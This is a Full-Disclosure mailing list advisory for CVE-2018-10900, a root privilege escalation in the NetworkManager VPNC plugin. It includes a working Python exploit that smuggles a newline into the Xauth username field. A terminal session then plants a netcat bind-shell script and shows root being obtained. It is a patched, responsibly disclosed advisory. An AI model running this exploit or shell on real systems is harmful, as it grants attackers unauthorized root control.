lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <55822e57-bbaa-521a-ed90-c450803eb5cc@pulsesecurity.co.nz>
Date: Mon, 23 Jul 2018 16:58:33 +1200
From: Denis Andzakovic via Fulldisclosure <fulldisclosure@...lists.org>
To: fulldisclosure@...lists.org
Subject: [FD] Network Manager VPNC - Privilege Escalation (CVE-2018-10900)

Network Manager VPNC - Privilege Escalation (CVE-2018-10900)

Release URL: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
Date Released: 21/07/2018  
CVE: CVE-2018-10900
Author: Denis Andzakovic  
Source: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc  
Affected Software: Network Manager VPNC – 1.2.4  

--[ Description
The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A new line character can be used to inject a Password helper parameter into the configuration data passed to VPNC, allowing an attacker to execute arbitrary commands as root. 

--[ Privilege Escalation

When initiating a VPNC connection, Network Manager spawns a new vpnc process and passes the configuration via STDIN. By injecting a \n character into a configuration parameter, an attacker can coerce Network Manager to set the Password helper option to an attacker controlled executable file.

The following python script generates a VPNC connection which will execute the /tmp/test file when connected. The new line character is injected into the Xauth username parameter.

import dbus
con = {
    'vpn':{
        'service-type':'org.freedesktop.NetworkManager.vpnc',
        'data':{
            'IKE DH Group':'dh2',
            'IPSec ID':'testgroup',
            'IPSec gateway':'gateway',
            'IPSec secret-flags':'4',
            'Local Port':'0',
            'NAT Traversal Mode': 'natt',
            'Perfect Forward Secrecy': 'server',
            'Vendor': 'cisco',
            'Xauth password-flags': '4',
            'Xauth username': "username\nPassword helper /tmp/test",
            'ipsec-secret-type': 'unused',
            'xauth-password-type': 'unused'
            }
    },
    'connection':{
        'type':'vpn',
        'id':'vpnc_test',
    },
    'ipv4':{'method':'auto'},
    'ipv6':{'method':'auto'}
}
bus = dbus.SystemBus()
proxy = bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager/Settings")
settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")
settings.AddConnection(con)

The above results in the following configuration being passed to the vpnc process when the connection is initialized:  

Debug 0
Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950  --bus-name org.freedesktop.NetworkManager.vpnc.Connection_4
Cisco UDP Encapsulation Port 0
Local Port 0
IKE DH Group dh2
Perfect Forward Secrecy server
Xauth username username
Password helper /tmp/test
IPSec gateway gateway
IPSec ID testgroup
Vendor cisco
NAT Traversal Mode natt

The following figure details the complete privilege escalation attack.

doi@...ntu:~$ cat << EOF > /tmp/test
> #!/bin/bash
> mkfifo pipe
> nc -k -l -p 8080 < pipe | /bin/bash > pipe
> EOF
doi@...ntu:~$ python vpnc_privesc.py
doi@...ntu:~$ nmcli connection
NAME                UUID                                  TYPE      DEVICE
Wired connection 1  a8b178fd-8cbc-3e15-aa9e-d52982215d98  ethernet  ens3
vpnc_test           233101cb-f786-44ed-9e4f-662f1a519429  vpn       ens3
doi@...ntu:~$ nmcli connection up vpnc_test

^Z
[1]+  Stopped                 nmcli connection up vpnc_test
doi@...ntu:~$ nc -vv 127.0.0.1 8080
Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)

--[ Timeline

11/07/2018 - Advisory sent to security@...me.org  
13/07/2018 - Acknowledgement from Gnome security  
20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day  
21/07/2018 - Network Manager VPNC 1.2.6 released
21/07/2018 - Advisory released

--[  About Pulse Security
Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and review services.

W: https://pulsesecurity.co.nz
E: info at pulsesecurity.co.nz


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ